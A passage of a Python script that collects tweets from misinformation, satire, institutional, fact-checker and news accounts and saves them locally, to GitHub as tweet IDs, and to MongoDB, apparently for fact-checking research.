More information in print_usage().\n\nRequirements:\n -> tweepy (pip install -U -q tweepy)\n -> emoji (pip install -U -q emoji)\n -> github (pip install -U -q PyGithub)\n -> tqdm (pip install -U -q tqdm)\n -> requests_oauthlib (pip install -U -q requests-oauthlib)\n -> pymongo (pip install pymongo)\n \nFurthermore, you should have a GitHub account and a Twitter Developer API \ncredentials. Contact me if you want to use our Twitter API. \n\n@author: Álvaro Huertas García\n\"\"\"\n# !pip install -U -q tweepy\n# !pip install -U -q emoji\n# !pip install -U PyGithub\n# !pip install -U -q tqdm\n\nimport pandas as pd\nimport time\nimport datetime\nimport os\nfrom optparse import OptionParser\nimport sys\nimport json\nfrom pymongo import MongoClient\n\n\ntry:\n import tweepy\n import emoji\n from github import Github\n from github import InputGitAuthor\n from tqdm import tqdm\n from requests_oauthlib import OAuth1Session\n \nexcept ImportError as error:\n print(error)\n print(\"\"\"Requirements:\n -> tweepy (pip install -U -q tweepy)\n -> emoji (pip install -U -q emoji)\n -> github (pip install -U -q PyGithub)\n -> tqdm (pip install -U -q tqdm)\n -> requests_oauthlib (pip install -U -q requests-oauthlib)\n -> pymongo (pip install pymongo)\"\"\")\n sys.exit()\n \n\n# Process command-line options\nparser = OptionParser(add_help_option=False)\n\n# General options\nparser.add_option('-h', '--help', action='store_true', help='Show this help message and exit.')\nparser.add_option('-t', '--today', action='store_true', help='Collect tweets from today')\nparser.add_option('-d', '--day', type='int', help='Number of days to go back in time to collect tweets')\nparser.add_option('-c', '--count', type= 'int', help = 'Number of tweets collected per user. Directly related with computing time.')\nparser.add_option(\"--tweets_source_info\", action = 'store_true', help = \"Information. Show the Twitter accounts used for the tweets extraction\")\nparser.add_option(\"--git_token\", type= \"str\", help = \"Token needed to access the Github repository where the results will be saved\")\nparser.add_option(\"--git_repo\", type = \"str\", help = \"Repository where you want to save the json file generated after tweet extraction\")\nparser.add_option(\"--git_autor\", type = \"str\", help = \"GitHub changes author\")\nparser.add_option(\"--git_autor_email\", type = \"str\", help = \"E-mail from the author\")\nparser.add_option('--api_key', type='str', help='Consumer key')\nparser.add_option('--api_secret_key', type='str', help='Consumer secret key')\nparser.add_option('--access_token', type='str', help='Access token')\nparser.add_option('--access_token_secret', type='str', help='Secret access token')\nparser.add_option('--save_local', action='store_true', help='Bool. If data should be save locally')\nparser.add_option('--local_path', type=\"str\", default =\"../local_tweets/\", help='Bool. If data should be save locally')\nparser.add_option('--mongo_user', type='str', help=\"MongoDB user\")\nparser.add_option('--mongo_pass', type='str', help=\"MongoDB password\")\nparser.add_option('--mongo_dbname', type='str', help=\"MongoDB database name\")\nparser.add_option('--mongo_collection', type='str', help=\"MongoDB collection name\")\n\n(options, args) = parser.parse_args()\n\ndef print_usage():\n print(\"\"\"\nInformation:\n This script allows the user to collects dehydrated and hydrated tweets from\n Twitter accounts. The user has several options to save the data extracted: \n locally, on GitHub, on MongoDB. 
To save locally use --save_local and --local_path\n commands. To save on GitHub use --git_token and --git_repo commands. To save\n the data on MongoDB use --mongo_user, --mongo_pass, --mongo_dbname, --mongo_collection.\n \n \n The default Twitter accounts were selected by hand. \n Feel free to change the ones selected in this script. Tweets extractions is\n accomplish using Tweepy. Hydrated tweets are saved locally. Dehydrated tweets\n are the ones uploaded to GitHub. Nevertheless, the user decides if tweets\n should be saved locally (and the path desired) or saved on GitHub (and the\n repository desired). \n \n Be aware of the \"Rate Limits\" from Twitter. Among these limits, the number of\n tweet extraction requests is up to 450 in a temporal window of 15 minutes. \n Once the temporal windows ends, the number of requests are restarted.\n Nevertheless, the code has been developed to manage and inform about these\n temporal windows and to continue the tweets extraction. \n \n Moreover, you should be aware that Twitter Policy only allows to extract \n tweets within the las 7 days (30 days for Premium API). \n\n The tweets collected are saved as json files. The Twitter accounts without\n tweets available for the date selected do not create json files. The information\n saved in the json files are the following ones: \n - account name\n - tweet id\n - full text (both tweet and retweet)\n - verification of the account\n - tweet date creation\n - nº of times retweeted\n - favourites count\n - tweet location (if available)\n - account url \n - tweet entities (url, hastags, etc)\n\nUsage: \n python Tweet_wrapper_v2.py [options]\n\nOptions:\n -t, --today Collect tweets from today\n -d, --day Number of days to go back in time to collect tweets. Ex: 1 = yesterday.\n -c, --count Number of tweets collected per user. Directly related with computing time. Default: 200 \n --git_token Token needed to access the Github repository where the results will be saved\n --git_repo Repository where you want to save the json file generated after tweet extraction\n --tweets_source_info Information. Show the Twitter accounts used for the tweets extraction\n --git_autor GitHub changes author\n --git_autor_email E-mail author\n --api_key CONSUMER_KEY\n --api_secret_key CONSUMER_SECRET\n --access_token ACCESS TOKEN \n --access_token_secret ACCESS TOKEN SECRET\n --save_local Bool. If data should be save locally\n --local_path Path to save data locally. Default: \"../local_tweets/\"\n --mongo_user MongoDB user\n --mongo_pass MongoDB password\n --mongo_dbname MongoDB databse name\n --mongo_collection MongoDB collection name\n \nRequirements:\n -> tweepy (pip install -U -q tweepy)\n -> emoji (pip install -U -q emoji)\n -> github (pip install -U -q PyGithub)\n -> tqdm (pip install -U -q tqdm)\n -> requests_oauthlib (pip install -U -q requests-oauthlib)\n -> pymongo (pip install pymongo)\n \n Furthermore, you should have a GitHub account and a Twitter Developer API\n credentials. \n\nExample. 
\n\nCollect up to 100 tweets from today, save them locally and on GitHub:\n $ python Tweet_wrapper_v2.py -t -c 100 \\\n --save_local --local_path \"../local_tweets\" \\\n --git_token XXX --git_repo Huertas97/tweets_collection \\\n --api_key XXX --api_secret_key XXX --access_token XXX --access_token_secret XXX\n \nCollect up to 200 tweets from yesterday, save them locally (not GitHub): \n $ python Tweet_wrapper_v2.py -d 1 -c 200 \\\n --save_local --local_path \"../local_tweets\" \\\n --api_key XXX --api_secret_key XXX --access_token XXX --access_token_secret XXX\n\nCollect up to 40 tweets from 4 days ago, save them locally and on MongoDB (not GitHub): \n $ python Tweet_wrapper_v2.py -d 4 -c 40 \\\n --save_local --local_path \"../local_tweets\" \\\n --mongo_user Huertas97 --mongo_pass XXX \\\n --mongo_dbname fact-check-tweet-collection \\\n --mongo_collection tweets \\\n --api_key XXX --api_secret_key XXX --access_token XXX --access_token_secret XXX\n \"\"\")\n sys.exit()\n\n\n\ndef process_time(api):\n \"\"\"\n Function in charge of extracting the remaining number of requests allowed by\n the Twitter API. It also indicates when the time window is renewed\n to continue the tweet extraction.\n\n Parameters\n ----------\n api : API object\n API session\n\n Returns\n -------\n None.\n\n \"\"\"\n # Get the number of remaining requests\n remaining = int(api.last_response.headers['x-rate-limit-remaining'])\n print(\"Remaining requests:\", remaining)\n reset = int(api.last_response.headers['x-rate-limit-reset'])\n reset = datetime.datetime.fromtimestamp(reset)\n print(\"Requests reset at: \", reset)\n\ndef tweet_collect(user_name, text_query, since_date, count, language, result_type):\n \"\"\"\n Function in charge of requesting and collecting the tweets of a user.\n\n Parameters\n ----------\n user_name : string\n Twitter account name\n text_query : string\n Filters to apply to the search. E.g. \"from:user\" only searches within\n that user's tweets\n since_date: datetime\n Date of the tweets to collect; only tweets created on this day are kept\n count : int, optional\n Nº of tweets to extract. The default is 200\n language : string, optional\n Language filter. The default is \"es\".\n\n Returns\n -------\n tweets_df : pandas data frame\n Data Frame with one tweet per row and columns for: account name, tweet id,\n retweet flag, full text, account verification, creation date, retweet and\n favourite counts, account location, account url and tweet entities.\n\n \"\"\"\n \n query = text_query + user_name\n
\n print(\"\\nCollecting tweets from user {0}, date: {1}\".format(user_name, since_date.date()))\n next_day = since_date + datetime.timedelta(1)\n try:\n # Creation of query method using parameters\n tweets = tweepy.Cursor(api.search,\n q=query,\n lang=language,\n tweet_mode='extended',\n result_type = result_type,\n until = next_day.date()\n ).items(count)\n \n # Tweet info extraction\n tweets_list = []\n for tweet in tweets:\n if since_date.date() == tweet.created_at.date():\n # Full text (tweet or retweet)\n if 'retweeted_status' in tweet._json:\n is_retweet = True\n full_text = tweet._json['retweeted_status']['full_text']\n else:\n is_retweet = False\n full_text = tweet.full_text\n tweets_list.append([tweet.user.screen_name,\n tweet.id,\n is_retweet,\n full_text,\n tweet.user.verified,\n str(tweet.created_at),\n tweet.retweet_count, \n tweet.favorite_count,\n # tweet.reply_count, \n # tweet.retweeted_status,\n tweet.user.location,\n tweet.user.url,\n tweet.entities\n ])\n # We show the request number and available time window from the API\n process_time(api)\n # Data frame creation\n print(\"Number of tweets collected:\", len(tweets_list))\n if len(tweets_list) != 0:\n # Creation of dataframe from tweets list\n tweets_df = pd.DataFrame(tweets_list, columns=[\"screen_name\",\n \"tweet_id\",\n \"is_retweet\",\n \"text\",\n \"user_verified\",\n \"created_at\",\n \"retweet_count\",\n \"favorite_count\",\n # \"reply_count\",\n # \"retweet_status\",\n \"user_location\",\n \"user_url\",\n \"entities\"])\n # Convert emojis to their text aliases\n tweets_df[\"text\"] = tweets_df[\"text\"].apply(emoji.demojize)\n \n return tweets_df\n else:\n pass\n\n except BaseException as e:\n print('failed on_status,', str(e))\n time.sleep(3)\n\n\ndef push(path, message, content, author, author_mail, branch = \"main\"):\n \"\"\"\n Function in charge of uploading the dehydrated TXT files to GitHub.\n\n Parameters\n ----------\n path : string\n File path to upload to GitHub.\n message : string\n Commit message\n content : string\n TXT file content\n branch : string, optional\n Branch to push the TXT file to. The default is \"main\".\n\n Returns\n -------\n None.\n\n \"\"\"\n author = InputGitAuthor(\n author,\n author_mail\n )\n try: # If file already exists, update it\n # Retrieve old file to get its SHA and path\n contents = repo.get_contents(path, ref=branch)\n repo.update_file(contents.path,\n message,\n content,\n contents.sha,\n branch=branch,\n author=author) # Add, commit and push branch\n print(\"Update:\", path)\n print()\n except: # If file doesn't exist, create it\n repo.create_file(path,\n message,\n content,\n branch=branch,\n author=author) # Add, commit and push branch\n print(\"Creating:\", path)\n print()\n\n\n# Number of option arguments. The first argument is always the script's own file name\nnumOpts = len(sys.argv)\n\n
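# Added note (not part of the original script): optparse leaves sys.argv intact,\n# so with no command-line arguments numOpts == 1 and the help text is printed.\n# No options... 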
print help.\nif numOpts < 2:\n print_usage()\nelif options.help:\n print_usage()\n \n# Twiiter Accounts\ndic_user = {\n # Hastags\n \"Plandemia\": [\"es\", \"#\", \"mixed\"],\n \"yonomeconfino\": [\"es\", \"#\", \"mixed\"],\n \"coronatimo\": [\"es\", \"#\", \"mixed\"],\n \"YoNoMeVacuno\": [\"es\", \"#\", \"mixed\"],\n \"covid1984\": [\"es\", \"#\", \"mixed\"],\n \"NoalaVacuna\": [\"es\", \"#\", \"mixed\"],\n \"#VirusChino\": [\"es\", \"#\", \"mixed\"],\n \"#VacunaRusa\": [\"es\", \"#\", \"mixed\"],\n \"#PCRFraude\": [\"es\", \"#\", \"mixed\"],\n \"#FactCHAT\": [\"en\", \"#\", \"mixed\"],\n \"#FakePCR\": [\"es\", \"#\", \"mixed\"],\n # infodemia \n \n \n # Not checked\n \"No__Plandemia\": [\"es\", \"from:\"],\n \"ANTIMASCARILLA\": [\"es\", \"from:\"],\n \"FoxMuld88326271\": [\"es\", \"from:\"],\n \"PericoAFuego\": [\"es\", \"from:\"],\n \"DiegoMo53772865\": [\"es\", \"from:\"],\n \"the_raven77\": [\"es\", \"from:\"],\n \"LRsecreta\": [\"es\", \"from:\"],\n \"JL_MDesconocido\": [\"es\", \"from:\"],\n \"AtraviesaLoDesc\": [\"es\", \"from:\"],\n \"HomeopatiaY\": [\"es\", \"from:\"],\n \"NaturopatasCol\": [\"es\", \"from:\"],\n \"MiHerbolario\": [\"es\", \"from:\"],\n \"HerbolarioLola\": [\"es\", \"from:\"],\n \"PacienteL\": [\"es\", \"from:\"],\n \"elphabaz\": [\"es\", \"from:\"],\n \"IsTortugo\": [\"es\", \"from:\"],\n \"tecn_preocupado\": [\"es\", \"from:\"],\n \"BabylonDab\": [\"es\", \"from:\"],\n \"lamjort\": [\"es\", \"from:\"],\n \"VaccineXchange\": [\"en\", \"from:\"],\n \"gonzo_blogger\": [\"es\", \"from:\"],\n \"CarmCerb21\": [\"es\", \"from:\"],\n \"panguerrera1\": [\"es\", \"from:\"],\n \"AlbaGar74381296\": [\"es\", \"from:\"],\n \"MediterraneoDGT\": [\"es\", \"from:\"],\n \"JosPastr\": [\"es\", \"from:\"],\n \"velardedaoiz2\": [\"es\", \"-filter:replies AND-filter:retweet AND from:\"],\n \"JordiFlynn\": [\"es\", \"(coronavirus OR cov OR covid OR sars) AND from:\"],\n \"mitokondriac\": [\"es\", \"from:\"],\n \"AquAhora1\": [\"es\", \"from:\"],\n \"patrilaselma\": [\"es\", \"from:\"],\n \"doctor_papaya\": [\"es\", \"from:\"],\n \"Autnomacabread1\": [\"es\", \"(virus OR coronavirus OR covid OR sars) AND from:\"],\n \"LaRetuerka\": [\"es\", \"from:\"],\n \"DathosBD\": [\"es\", \"-filter:replies AND (virus OR coronavirus OR covid OR sars) AND from:\"],\n \"PorunChileDigno\": [\"es\", \"-filter:replies AND from:\"], # Chile\n \"1333Despierta\": [\"es\", \"-filter:replies AND from:\"],\n \"NoHayPandemia__\": [\"es\", \"-filter:replies AND from:\"],\n \"Musicolorista\": [\"es\", \"-filter:replies AND from:\"],\n \"ELMINIMALISTA1\": [\"es\", \"-filter:replies AND from:\"],\n \"Africamar\": [\"es\", \"-filter:replies AND from:\"],\n \"informate_infor\": [\"es\", \"-filter:replies AND from:\"],\n \"ElTrompetista78\": [\"es\", \"-filter:replies AND from:\"],\n \"Angelisimo2\": [\"es\", \"-filter:replies AND from:\"],\n \"_nWorder\": [\"es\", \"-filter:replies AND from:\"],\n \"papayaykware\": [\"es\", \"-filter:replies AND from:\"],\n \"trustdall271\": [\"es\", \"-filter:replies AND from:\"],\n \"elentirvigo\": [\"es\", \"-filter:replies AND from:\"],\n \"ProgreAzote\": [\"es\", \"-filter:replies AND from:\"],\n \"The_Cling_On\": [\"en\", \"from:\"], # Australia\n \n \n # Satire\n \"elmundotoday\": [\"es\", \"from:\"],\n \"eljueves\": [\"es\", \"from:\"],\n \"okdiario\": [\"es\", \"from:\"],\n \"LaVozdelBecario\": [\"es\", \"from:\"],\n \"HayNoticia\": [\"es\", \"from:\"],\n \"FrayJosepho\": [\"es\", \"from:\"],\n \"ChiguireBipolar\": [\"es\", \"from:\"], # Venezuela\n \"actualidadpanam\": 
[\"es\", \"from:\"],# Colombia\n \"revisbarcelona\": [\"es\", \"from:\"],# Argentina\n \"thecliniccl\": [\"es\", \"from:\"],# Chile\n \"TheBabylonBee\": [\"en\", \"from:\"], # US \n \"TheOnion\": [\"en\", \"from:\"], # US \n \n \n \n # Doubtful\n \"tiramillas\": [\"es\", \"from:\"],\n \"20m\": [\"es\", \"from:\"],\n \"ActualidadRT\": [\"es\", \"from:\"],\n \"ldpsincomplejos\": [\"es\", \"-filter:replies AND from:\"],\n \"hermanntertsch\": [\"es\", \"-filter:replies AND -filter:retweet AND from:\"],\n \"NiusDiario\": [\"es\", \"from:\"], # no es tan dudoso pero habría que chequear\n \"LaVozIberica\": [\"es\", \"from:\"],\n \"periodistadigit\": [\"es\", \"from:\"],\n \"CancerIntegral\": [\"es\", \"from:\"],\n \n # Donald Trump in Spanish\n \"POTUS_Trump_ESP\": [\"es\", \"-filter:replies AND -filter:retweet AND from:\"],\n \n # Institutions\n \"SaludPublicaEs\": [\"es\", \"from:\"],\n \"sanidadgob\": [\"es\", \"from:\"],\n \"andaluciadatos\": [\"es\", \"from:\"],\n \"opsoms\": [\"es\", \"from:\"],\n \"WHO\": [\"en\", \"from:\"],\n \"AEMPSGOB\": [\"es\", \"from:\"], # spanish drug agency\n \"FDAenEspanol\": [\"es\", \"from:\"],\n \"CDCespanol\": [\"es\", \"from:\"],\n \"policia\": [\"es\", \"from:\"],\n \"guardiacivil\": [\"es\", \"from:\"],\n \"US_FDA\": [\"en\", \"from:\"],\n \"FDA_Drug_Info\": [\"en\", \"from:\"],\n \"FDArecalls\": [\"en\", \"from:\"],\n \"CDCgov\": [\"en\", \"from:\"],\n \"NIH\": [\"en\", \"from:\"],\n \"NEJM\": [\"en\", \"from:\"],\n \"HopkinsMedicine\": [\"en\", \"from:\"],\n \"MayoClinic\": [\"en\", \"from:\"],\n \n # Scientific magazines\n \"NatureComms\": [\"en\", \"from:\"],\n \"researchnews\": [\"en\", \"from:\"],\n \"CellPressNews\": [\"en\", \"from:\"],\n \"TrendsMolecMed\": [\"en\", \"from:\"],\n \"embojournal\": [\"en\", \"from:\"],\n \n # Fact-checkers\n \"malditobulo\": [\"es\", \"from:\"], # España\n \"maldita_ciencia\": [\"es\", \"from:\"], # España\n \"EFEVerifica\": [\"es\", \"from:\"], # España\n \"Chequeado\": [\"es\", \"from:\"], # Argentina\n \"Newtral\": [\"es\", \"from:\"], # España\n \"FullFact\": [\"en\", \"from:\"], # Inglés\n \"ElSabuesoAP\": [\"es\", \"from:\"], # Mexico\n \"cotejoinfo\": [\"es\", \"from:\"], # Venezuela\n \"ECUADORCHEQUEA\": [\"es\", \"from:\"], # Ecuador\n \"lasillavacia\": [\"es\", \"from:\"], # Colombia\n \"AP\": [\"en\", \"from:\"], # US\n \"AfricaCheck\": [\"en\", \"from:\"], # Africa\n \"aosfatos\": [\"pt\", \"from:\"], # Brasil\n \"AAPNewswire\": [\"en\", \"from:\"], # Australia\n \"boomlive_in\": [\"en\", \"from:\"], # India\n \"correctiv_org\": [\"de\", \"from:\"], # Alemania\n \"Check_Your_Fact\": [\"en\", \"from:\"], # USA\n \"CheckCongo\": [\"fr\", \"from:\"], # Congo\n \"DemagogPL\": [\"pl\", \"from:\"], # Polonia\n \"dubawaNG\": [\"en\", \"from:\"], # Nigeria\n \"estadaoverifica\": [\"pt\", \"from:\"], # Brasil\n \"FactlyIndia\": [\"en\", \"from:\"], # India\n \"FactCrescendo\": [\"en\", \"from:\"], # India\n \"FactCheckNI\": [\"en\", \"from:\"], # United Kingdom\n \"ghana_fact\": [\"en\", \"from:\"], # Ghana\n \"Fatabyyano_com\": [\"ar\", \"from:\"], # Jordania\n \"FerretScot\": [\"en\", \"from:\"], # United Kingdom (Scotland)\n \"Observateurs\": [\"fr\", \"from:\"], # Francia\n \"lemondefr\": [\"fr\", \"from:\"], # Francia\n \"CheckNewsfr\": [\"fr\", \"from:\"], # Australia\n \"LogicallyAI\": [\"en\", \"from:\"], # United Kingdom\n \"MaharatNews\": [\"ar\", \"from:\"], # Libano\n \"Poynter\": [\"en\", \"from:\"], # Internacional\n \"mediawise\": [\"en\", \"from:\"], # USA\n \"NewsMobileIndia\": [\"en\", 
\"from:\"], # India\n \"NewsMeter_In\": [\"en\", \"from:\"], # India\n \"observadorpt\": [\"pt\", \"from:\"], # Portugal\n \"PesaCheck\": [\"en\", \"from:\"], # Kenya\n \"JornalPoligrafo\": [\"pt\", \"from:\"], # Portugal\n \"ABCFactCheck\": [\"en\", \"from:\"], # Australia\n \"rapplerdotcom\": [\"en\", \"from:\"], # Filipinas\n \"ReutersAgency\": [\"en\", \"from:\"], # United States\n \"ClimateFdbk\": [\"en\", \"from:\"], # France\n \"eye_digit\": [\"en\", \"from:\"], # India\n \"SouthAsiaCheck\": [\"en\", \"from:\"], # Nepal\n \"StopFakingNews\": [\"ru\", \"from:\"], # Ucrania\n \"IndiaToday\": [\"en\", \"from:\"], # India\n \"factchecknet\": [\"en\", \"from:\"], # Internacional\n \"thedispatch\": [\"en\", \"from:\"], # USA\n \"ThipMedia\": [\"en\", \"from:\"], # India\n \"TheQuint\": [\"en\", \"from:\"], # India\n \"GlennKesslerWP\": [\"en\", \"from:\"], # chief writer of Washington Post's Fact Checker\n \"thejournal_ie\": [\"en\", \"from:\"], # Ireland\n \"USATODAY\": [\"en\", \"from:\"], # USA\n \"verafiles\": [\"en\", \"from:\"], # Filipinas\n \"newsvishvas\": [\"en\", \"from:\"], # India\n \"dpa\": [\"de\", \"from:\"], # Alemania\n \"dogrulukpayicom\": [\"tr\", \"from:\"], # Turquia\n \"PagellaPolitica\": [\"it\", \"from:\"], # Italia\n \"teyitorg\": [\"tr\", \"from:\"], # Turquia\n \"NUnl\": [\"nl\", \"from:\"], # Holanda\n \"snopes\": [\"en\", \"from:\"], # USA\n \"franceinfo\": [\"fr\", \"from:\"], # France\n \n \n # America newspapers\n \"JustiaLatinAmer\": [\"es\", \"from:\"], # Latino América\n \"ReutersLatam\": [\"es\", \"from:\"], # Latino América\n \"UniNoticias\": [\"es\", \"from:\"], # Latino América\n \"14ymedio\": [\"es\", \"from:\"], # Cuba\n \"prensa_libre\": [\"es\", \"from:\"], # Guatemala (Recommended by The Guardian)\n \"ABCDigital\": [\"es\", \"from:\"], # Paraguay (Recommended by The Guardian)\n \"ObservadorUY\": [\"es\", \"from:\"], # Urugay (Recommended by The Guardian) \n \"Milenio\": [\"es\", \"from:\"], # México (Recommended by The Guardian)\n \"ElMercurio_cl\": [\"es\", \"from:\"], # Chile (Recommended by The Guardian)\n \"elcomerciocom\": [\"es\", \"from:\"], # Ecuador (Recommended by The Guardian)\n \"ElMundoBolivia\": [\"es\", \"from:\"], # Bolivia (Recommended by The Guardian)\n \"laprensa\": [\"es\", \"from:\"], # Nicaragua (Recommended by The Guardian)\n \"elespectador\": [\"es\", \"from:\"], # Colombia (Recommended by The Guardian)\n \n # America newspapers renowed\n \"Pajaropolitico\": [\"es\", \"from:\"], # from Poynter\n \"elcomerciodigit\": [\"es\", \"from:\"], # The Trust Project Perú\n \"LANACION\": [\"es\", \"from:\"], # The Trust Project Argetina\n \"ElUniversal\": [\"es\", \"from:\"], # The Trust Project Venezuela\n \n # US newspapers\n \"nytimes\": [\"en\", \"from:\"], # US\n \"AmPress\": [\"en\", \"from:\"], # US\n \n # Spain newspapers\n \"el_pais\": [\"es\", \"from:\"],\n \"eldiarioes\": [\"es\", \"from:\"],\n \"elmundoes\": [\"es\", \"from:\"],\n \"EFEnoticias\": [\"es\", \"from:\"],\n \"abc_es\": [\"es\", \"from:\"],\n \"telediario_tve\": [\"es\", \"from:\"],\n \"24h_tve\": [\"es\", \"from:\"],\n \n # International newspaper\n \"bbcmundo\": [\"es\", \"from:\"], # Internacional\n \n # MEdical magazines from Spain\n \"diariomedico\": [\"es\", \"from:\"],\n \"Consalud_es\": [\"es\", \"from:\"],\n \"redaccionmedica\": [\"es\", \"from:\"],\n \"VaccineSafetyN\": [\"en\", \"from:\"]\n\n}\n\n# Feel free to modify the Twitter accounts showed above\n# dic_user = {\n# # \"US_FDA\": [\"en\", \"from:\"] \n# \"el_pais\": [\"es\", \"from:\"],\n# 
\"EFEnoticias\": [\"es\", \"from:\"],\n# \"abc_es\": [\"es\", \"from:\"],\n# \"telediario_tve\": [\"es\", \"from:\"],\n# \"24h_tve\": [\"es\", \"from:\"],\n# \"franceinfo\": [\"fr\", \"from:\"]\n# }\n\n\n# Only Fact--checker Twitter accounts will be saved on MongoDB\nchecked_users = ['malditobulo',\n 'maldita_ciencia',\n 'EFEVerifica',\n 'Chequeado',\n 'Newtral',\n 'FullFact',\n 'ElSabuesoAP',\n 'cotejoinfo',\n 'ECUADORCHEQUEA',\n 'lasillavacia',\n 'AP',\n 'AfricaCheck',\n 'aosfatos',\n 'AAPNewswire',\n 'boomlive_in',\n 'correctiv_org',\n 'Check_Your_Fact',\n 'CheckCongo',\n 'DemagogPL',\n 'dubawaNG',\n 'estadaoverifica',\n 'FactlyIndia',\n 'FactCrescendo',\n 'FactCheckNI',\n 'ghana_fact',\n 'Fatabyyano_com',\n 'FerretScot',\n 'Observateurs',\n 'lemondefr',\n 'CheckNewsfr',\n 'LogicallyAI',\n 'MaharatNews',\n 'Poynter',\n 'mediawise',\n 'NewsMobileIndia',\n 'NewsMeter_In',\n 'observadorpt',\n 'PesaCheck',\n 'JornalPoligrafo',\n 'ABCFactCheck',\n 'rapplerdotcom',\n 'ReutersAgency',\n 'ClimateFdbk',\n 'eye_digit',\n 'SouthAsiaCheck',\n 'StopFakingNews',\n 'IndiaToday',\n 'factchecknet',\n 'thedispatch',\n 'ThipMedia',\n 'TheQuint',\n 'GlennKesslerWP',\n 'thejournal_ie',\n 'USATODAY',\n 'verafiles',\n 'newsvishvas',\n 'dpa',\n 'dogrulukpayicom',\n 'PagellaPolitica',\n 'teyitorg',\n 'NUnl',\n 'snopes',\n 'franceinfo']\n\ndef print_tweets_source_info(dic_user):\n print(\"\"\"Twitter accounts used by default:\"\"\")\n print(sorted(list(dic_user.keys())))\n sys.exit()\n \nif options.tweets_source_info:\n print_tweets_source_info(dic_user) \n \n \nif not all([options.api_key, options.api_secret_key,\n options.access_token, options.access_token_secret\n ]) or options.help:\n print_usage() \n \nif options.today: # and not options.yesterday: \n # Create date starting from 00:00h\n now_datetime = datetime.datetime.now()\n since_date = now_datetime.replace(hour=23, minute=59, second=59,\n microsecond=999999)\n \nif options.day:\n since_date = datetime.datetime.now() - datetime.timedelta(options.day)\n since_date = since_date.replace(hour=23, minute=59, second=59, \n microsecond=999999)\n# Default number of tweets\nif not options.count:\n options.count = 200\n \n\n\n# CREDENTIALS for Twitter API \napi_key = options.api_key\napi_secret_key = options.api_secret_key\naccess_token = options.access_token\naccess_token_secret = options.access_token_secret\n\n\n# GitHub option\nif options.git_token and options.git_repo:\n g = Github(options.git_token)\n repo = g.get_repo(options.git_repo)\n print(\"----------- Saving tweets on GitHub: {}-----------\".format(repo)) \n \n if options.git_autor:\n autor = options.git_autor\n else:\n autor = \"Huertas97\"\n\n if options.git_autor_email:\n email = options.git_autor_email\n else:\n email = \"ahuertasg01@gmail.com\"\n\nelse: \n print(\"----------- Tweets will not be stored on GitHub -----------\") \n \n\n# Local option\nif options.save_local:\n print(\"----------- Saving tweets locally on: {} -----------\".format(options.local_path)) \nelse: \n print(\"----------- Tweets will not be stored locally -----------\") \n\n\n# Save in MongoDB\nif all([options.mongo_user, options.mongo_pass, options.mongo_dbname,\n options.mongo_collection]):\n print(\"----------- Saving tweets on MongoDB. 
db: {}, collection: {} -----------\".format(options.mongo_dbname,\n options.mongo_collection)) \nelse: \n print(\"----------- Tweets will not be stored on MongoDB-----------\") \n\n# STARTING Twitter API\ntwitter = OAuth1Session(api_key,\n client_secret=api_secret_key,\n resource_owner_key=access_token,\n resource_owner_secret=access_token_secret)\n\n## Access to the App per user \n# OAuth 1a (application-user). Rate limit: 180 requests in 15 min window\n# auth = tweepy.OAuthHandler(api_key, api_secret_key)\n# auth.set_access_token(access_token, access_token_secret)\n\n## Access to the App directly (more amount of requests available)\n# OAuth 2 (application-only). Rate limit: 450 requets in 15 min window\nauth = tweepy.AppAuthHandler(api_key, api_secret_key)\n\n# When we set wait_on_rate_limit to True, we will have our program wait\n# automatically 15 minutes so that Twitter does not lock us out, whenever we\n# exceed the rate limit and we automatically continue to get new data!\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\n\n\n\n# today = datetime.date.today()\ndate = since_date.date()\nprint(date)\n\n\n\n\ndef json2dic(file_name, root):\n file_path = os.path.join(root, file_name)\n with open(file_path) as f:\n data = json.load(f)\n return data\n\n\n\n\nfor key, value in tqdm(dic_user.items(), desc=\"Progess\"):\n user_name = key\n language = value[0]\n text_query = value[1]\n try:\n result_type = value[2]\n except:\n result_type = \"recent\"\n tweets_df = tweet_collect(count = options.count,\n language = language,\n text_query = text_query,\n user_name = user_name,\n result_type = result_type,\n since_date=since_date\n )\n \n \n \n # If a df is returned push it\n if isinstance(tweets_df, pd.DataFrame):\n \n \n # Save locally\n if options.save_local:\n # create folders and move json file to that folder by date\n local_folder = os.path.join(options.local_path, str(date))\n os.makedirs(local_folder, exist_ok=True)\n local_file_name = user_name+\"-\"+str(date)+\".json\"\n \n # Pandas df to json format\n tweets_df.to_json(os.path.join(local_folder, local_file_name))\n \n \n\n # Save on GitHub\n if options.git_token and options.git_repo:\n # create folders and move json file to that folder by date\n os.makedirs(os.path.join(\"./tweets\", str(date)), exist_ok=True)\n git_file_name = user_name+\"-\"+str(date)+\".txt\"\n git_file_path = os.path.join(\"./tweets\", str(date), git_file_name)\n \n # Extract tweets_id and save it as txt\n tweets_df[\"tweet_id\"].to_csv(git_file_path, header=None, index=None, sep=' ', mode='w')\n\n # GitHub will only receive tweets ids (Twitter Privacy Conditions)\n # Extract the content to push\n file_content = open(git_file_path.replace(\"\\\\\",\"/\") , \"r\").read()\n push(path = git_file_path.replace(\"\\\\\",\"/\"), message = \"Tweets from: \" + str(date), content = file_content,\n author = autor, author_mail = email)\n \n # Save on MongoDB\n if all([options.mongo_user, options.mongo_pass, options.mongo_dbname,\n options.mongo_collection]):\n mongo_file_name = user_name+\"-\"+str(date)+\".json\"\n\n mongo_user = options.mongo_user\n mongo_pass = options.mongo_pass\n mongo_dbname = options.mongo_dbname\n mongo_collection = options.mongo_collection\n client = MongoClient(\"mongodb+srv://\" + mongo_user + \":\" +\n mongo_pass + \"@fact-check-tweet-collec.oaort.mongodb.net/\" + \n mongo_dbname + \"?retryWrites=true&w=majority\")\n db = client[mongo_dbname] # [\"fact-check-tweet-collection\"]\n collection = db[mongo_collection]\n \n \n # Check and delete if file 
